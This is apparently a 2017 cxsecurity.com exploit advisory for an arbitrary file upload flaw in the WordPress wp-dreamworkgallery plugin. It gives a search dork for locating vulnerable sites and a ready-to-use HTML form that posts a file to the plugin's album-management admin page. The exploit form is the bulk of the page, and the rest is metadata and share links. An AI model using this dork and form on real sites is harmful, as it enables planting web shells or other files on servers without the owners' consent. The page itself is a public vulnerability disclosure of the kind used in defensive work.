Wordpress wp-dreamworkgallery File Upload Vulnerability

Published
Credit
Risk
2017.03.31
DarkSect Trevvort
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:/wp-content/plugins/wp-dreamworkgallery/

Exploit :

<html>
<body>
<form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Video :
https://youtu.be/irZFw45-O_s

References:

https://youtu.be/irZFw45-O_s


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com